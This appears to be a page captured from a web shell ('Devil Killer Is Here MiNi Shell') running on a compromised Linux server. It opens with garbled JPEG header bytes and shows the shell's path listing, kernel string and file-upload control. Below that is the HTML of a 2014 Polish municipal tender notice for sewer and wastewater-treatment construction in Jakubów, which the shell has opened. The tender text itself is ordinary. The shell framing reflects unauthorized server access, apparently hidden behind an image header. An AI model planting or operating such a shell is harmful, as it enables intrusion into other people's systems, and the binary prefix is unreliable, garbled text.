JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140630/218304-N-2014.html

<p class="kh_header"><b>Jakubów: Przetarg nieograniczony na roboty budowlane  pn.: Budowa kanalizacji sanitarnej w miejscowości Mistów wraz z budową oczyszczalni ścieków  w miejscowości Leontyna gmina Jakubów</b><br>
<b>Numer ogłoszenia: 218304 - 2014; data zamieszczenia: 30.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Jakubów , Jakubów 55, 05-306 Jakubów, woj. mazowieckie, tel. 025 7579190, faks 025 7579190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.jakubow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na roboty budowlane  pn.: Budowa kanalizacji sanitarnej w miejscowości Mistów wraz z budową oczyszczalni ścieków  w miejscowości Leontyna gmina Jakubów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Budowa kanalizacji sanitarnej w miejscowości   Mistów wraz z budową oczyszczalni ścieków  w miejscowości Leontyna gmina  Jakubów. 
2.Zakres robót obejmuje:
a)budowa mechaniczno -biologicznej oczyszczalni ścieków  
budynek techniczny , reaktor osadu czynnego /bioreaktor/ , pompownia , zbiornik osadu , punkt zlewny ze zbiornikiem uśredniającym , studnia pomiarowa , studnie , przyłącze wodociągowe sieci wod-kan na terenie, kanał odpływowy ścieków oczyszczonych ,drogi i zagospodarowanie terenu, instalacje elektryczne , instalacje sanitarne - wewnętrzne
b)budowa kanalizacji sanitarnej - zlewnia do oczyszczalni scieków
sieć kanalizacyjna , rurociągi grawitacyjne  - kanał ściekowy PVC  O 250, O 200, O 160, studzienki  systemowe z tworzywa sztucznego O 425 mm , rurociągi tłoczne - kanał  ściekowy  PE PN 10  O 125 i 110, studzienki odwodnieniowe i odpowietrzające, przejścia rurociągów grawitacyjnych i ciśnieniowych pod drogami asfaltowymi należy , wykonać metodą  przecisku bez naruszenia konstrukcji drogi, tłocznie ścieków należy zakupić jako kompletny obiekt
c)kanały boczne (przyłącza do pierwszej studzienki na posesji) - zlewnia do oczyszczalni ścieków
d)przyłącze wodociągowe do oczyszczalni ścieków na działkach 156,28,29,33
Inwestycja realizowana będzie na działkach Nr 229/3, 468/2, 229/4, 469, 230, 191, 470, 232/1, 471/1, 193, 194, 254/1, 472/1, 198, 474/2, 259, 475/1, 238/6, 283/3, 227, 51/2  w miejscowości Mistów  oraz na działkach Nr  28, 29, 33, 156 w miejscowości Leontyna.
3.Wykonawca przeprowadzi uruchomienie i rozruch oczyszczalni. 
4.Wykonawca w ramach niniejszego zamówienia przeprowadzi przeszkolenie obsługi  osób wskazanych przez Zamawiającego.
5.Zamówienie zostanie w pełni zrealizowane z materiałów i urządzeń wyłącznie fabrycznie nowych, które zapewni Wykonawca. Ponadto Wykonawca zapewni  odpowiedni sprzęt do wykonania  niniejszego zamówienia.
6.Zamawiający wymaga od Wykonawcy udzielenia gwarancji jakości na zrealizowany  przedmiot zamówienia, w tym na: wykonane roboty budowlane - 36 miesięcy,  zamontowane urządzenia - 36 miesięcy
Okres gwarancji liczony będzie od dnia odebrania przez Zamawiającego robót budowlanych i podpisania bez uwag protokołu odbioru końcowego przedmiotu zamówienia.
7.Szczegółowy zakres i opis przedmiotu zamówienia określony jest w: dokumentacji projektowej- Załącznik  do SIWZ, STWiOR zawierającej zbiory wymagań w zakresie wykonania robót budowlanych, właściwości materiałów i urządzeń oraz wymagania w zakresie prawidłowości wykonania poszczególnych robót - Załącznik do SIWZ, przedmiarach robót - Załącznik  do SIWZ 
8.Jeżeli w jakimkolwiek miejscu SIWZ oraz w załącznikach do niej przy opisywaniu  
przedmiotu zamówienia Zamawiający użył znaków towarowych i nazw producentów, należy je  traktować wyłącznie jako przykładowe. Wymienione znaki towarowe, patenty lub pochodzenie  materiałów czy urządzeń służących do wykonania niniejszego zamówienia służą wyłącznie ustaleniu  pożądanego standardu wykonania i określeniu właściwości i wymogów technicznych założonych w dokumentacji  technicznej oraz doprecyzowaniu  przedmiotu zamówienia. Zamawiający dopuszcza zastosowanie urządzeń równoważnych w oparciu o produkty i materiały  innych producentów pod warunkiem, że spełniają one te same właściwości techniczne oraz na  etapie realizacji inwestycji uzyskają akceptację projektanta, Inspektora Nadzoru i Zamawiającego. Wszelkie materiały i urządzenia określone w  Specyfikacji Istotnych Warunków Zamówienia  pochodzące od konkretnych producentów lub ze wskazaną marką albo patentem, określają wymagane przez Zamawiającego parametry techniczne, jakościowe i użytkowe, jakim muszą odpowiadać materiały/urządzenia oferowane, aby spełnić wymagania stawiane przez Zamawiającego. Ciężar udowodnienia, że materiał lub urządzenie jest równoważne w stosunku do wymogu określonego przez Zamawiającego spoczywa na Wykonawcy Wykonawca, który zamierza zastosować materiały lub urządzenia równoważne obowiązany  jest w ofercie wskazać w formularzu Wykaz urządzeń równoważnych - stanowiący  załącznik do SIWZ, które oferowane urządzenia lub/i materiały zostały zaoferowane jako równoważne oraz załączyć do oferty stosowne, potwierdzone przez producenta, dokumenty określające dane techniczne w zakresie odpowiadającym parametrom materiałów/urządzeń zaprojektowanych (np.: specyfikacje i karty techniczne) oraz wymagane prawem certyfikaty lub inne dokumenty dopuszczające dane materiały.
    Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych rozwiązań. 
    Zamawiający zastrzega sobie także prawo do korzystania z opinii ekspertów.
    Brak wskazania w załączniku propozycji zastosowania rozwiązań równoważnych oznaczać  będzie 
    deklarację wykonawcy, że przedmiot zamówienia zostanie wykonany przy zastosowaniu urządzeń 
     i materiałów określonych w SIWZ. Wykonawca składający ofertę zawierającą rozwiązania 
     równoważne ponosi pełną odpowiedzialność za prawidłowe funkcjonowanie rozwiązań 
     technicznych. Jeżeli materiały lub/i urządzenia zaoferowane przez Wykonawcę jako równoważne  
     nie będą równoważne do określonych w dokumentacji projektowej i STWiOR w świetle 
     przedłożonych przez Wykonawcę dokumentów, oferta tego Wykonawcy zostanie odrzucona  jako 
     nie odpowiadająca treści SIWZ.
     Zwrot równoważne oznacza możliwość uzyskania efektu założonego przez Zamawiającego  
     za pomocą innych rozwiązań technicznych poprzez dopuszczenie ofert opartych na  równoważnych 
     ustaleniach. 
   Dokumentacja techniczna do wglądu w Urzędzie Gminy w dniach poniedziałek - piątek 
   w godz. 800 - 1500..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.13.00-8, 45.25.21.00-9, 45.25.22.00-0, 45.23.24.00-6, 45.31.00.00-3, 45.33.00.00-9, 45.34.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każdy Wykonawca zobowiązany jest wnieść przed upływem terminu składania ofert,  
    wadium  w wysokości: 120 000,00. PLN (słownie: Sto dwadzieścia tysięcy złotych).
2.Wadium wnosi się przed upływem terminu składania ofert, tj. do dnia 16 lipca 2014 roku, 
     przed godz. 1030. 
3.Wadium może być wnoszone w następujących formach:
a)pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
          kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
         ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju 
         Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.)
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy na konto 
     Zamawiającego: Urząd Gminy Jakubów  Bank Spółdzielczy O/Jakubów  90 9226  
     0005 0050 0294 2000 0070  z dopiskiem Wadium-Budowa kanalizacji sanitarnej w 
     miejscowości Mistów wraz z budową oczyszczalni ścieków  w miejscowości Leontyna 
     gmina Jakubów
     Do oferty należy dołączyć kserokopię dowodu przelewu potwierdzającego wniesienie 
      wadium.
5.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu 
     potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania 
     ofert w siedzibie Zamawiającego w Urzędzie Gminy w Jakubowie, 05-306 Jakubów ul. Mińska 
     15 pok. Nr 1  lub dołączyć do oferty (w sposób umożliwiający wypięcie i przekazanie do kasy). 
     Kopia potwierdzająca wniesienie wadium winna być dołączona do oferty.
6.Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które znajdzie 
     się na rachunku bankowym Zamawiającego najpóźniej przed upływem terminu na składanie ofert, 
     tj. do dnia 16 lipca 2014 roku do godz. 1030.
     Wadium musi obejmować termin związania ofertą.
7.Nie wniesienie wadium w terminie lub w inny sposób niż określony w SiWZ spowoduje 
    wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego  oferta zostanie odrzucona 
    na podstawie art. 24 ust. 4 ustawy.
8.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta  
     została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
       w ofercie;
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po 
       stronie wykonawcy.
9.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, 
    o którym mowa w art. 26  ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w 
    art.25 ust. 1 ustawy, lub pełnomocnictw, chyba że  udowodni, że wynika to z przyczyn nieleżących 
    po jego stronie.
10.Pozostałe warunki dotyczące wadium określone są w art. 45 i 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonywana będzie na podstawie oświadczenia wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonywana będzie na podstawie Wykazu  robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy 
i doświadczenia wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania   ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
W tym celu należy wykazać, iż Wykonawca wykonał co najmniej po dwie roboty  budowlane odpowiadające swoim rodzajem robotom budowlanym  stanowiącym  przedmiot zamówienia tj:
-budowy, przebudowy, rozbudowy lub modernizacji czynnej oczyszczalni ścieków - o wartości co najmniej 1 500 00,00  każda
-budowy sieci kanalizacji sanitarnej lub przyłączy -  o wartości co najmniej 1  000 000,00 zł każda.
Jeżeli Wykonawca będzie polegał na doświadczeniu innych podmiotów, to zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji doświadczenia na okres korzystania z niego przy wykonywaniu  zamówienia z podaniem m.in.:
a)zakresu dostępnych Wykonawcy zasobów innego podmiotu, b)sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu 
         zamówienia,c)charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d)zakresu i okres udziału innego podmiotu przy wykonywaniu zamówienia
 wraz  z  dokumentami potwierdzającymi, że roboty te zostały wykonane  należycie  (referencje  lub protokoły odbioru). W/w dokumenty muszą być wystawione przez  bezpośredniego Inwestora  (odbiorcę wykonywanych robót budowlanych),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonywana będzie na podstawie oświadczenia Wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonywana będzie na podstawie Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności   
odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i  wykształcenia 
niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, sporządzony  na podstawie wzoru stanowiącego załącznik  do SIWZ .
Wykonawca musi wskazać do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby :
a)Kierownik budowy - posiadający co najmniej 5 letnie doświadczenie zawodowe na     stanowisku kierownika budowy, w tym przy realizacji co najmniej jednego kontraktu/zadania dotyczącego budowy, przebudowy, rozbudowy lub modernizacji czynnej oczyszczalni ścieków. Kierownik budowy powinien posiadać uprawnienia budowlane do kierowania robotami w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
b)Kierownik robót konstrukcyjno-budowlanych - powinien posiadać uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz minimum dwa lata doświadczenia na stanowisku kierownika budowy lub kierownika robót konstrukcyjno-budowlanych,
c)Kierownik robót instalacyjnych - powinien posiadać uprawnienia budowlane do kierowania robotami w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń oraz minimum dwa lata doświadczenia na stanowisku kierownika budowy lub kierownika robót instalacyjnych,
d)Kierownik robót elektrycznych - powinien posiadać uprawnienia budowlane do kierowania robotami w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń oraz minimum dwa lata doświadczenia na stanowisku kierownika budowy lub kierownika robót elektrycznych
Dopuszcza się, aby Kierownik budowy pełnił jednocześnie funkcję kierownika robót w branży, w której posiada uprawnienia. Jeżeli Wykonawca będzie polegał na osobach zdolnych do wykonania zamówienia  innych podmiotów, to zobowiązany jest przedstawić pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji osób na okres korzystania z nich przy  wykonywaniu zamówienia z podaniem  m.in.:
a)zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu 
         zamówienia,
c)charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)zakresu i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonywana będzie na podstawie 1.Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że 
    wykonawca   jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
    działalności  związanej z przedmiotem zamówienia o wartości co najmniej 2 000 000,00 zł
2.Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej 
    wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, 
    wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo 
    składania wniosków o  dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. 
    Informacja ma potwierdzić   posiadanie środków finansowych  lub zdolność kredytową w 

    wysokości co najmniej  2 000 000,00 zł.   
    Jeżeli Wykonawca będzie polegał na zdolnościach finansowych innych podmiotów, to   
    zobowiązany jest przedstawić: pisemne zobowiązanie tych podmiotów do oddania mu 
    do dyspozycji zasobów finansowych na okres korzystania z nich przy wykonywaniu 
    zamówienia, informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej,    
    potwierdzającą wysokość posiadanych środków  finansowych lub zdolność kredytową 
    Wykonawcy, wystawioną nie wcześniej niż 3  miesiące przed upływem terminu składania  
    ofert, dotyczącą podmiotu oddającego zasoby finansowe do dyspozycji 
    Wykonawcy,
    Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów                        dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może  przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie przez  zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

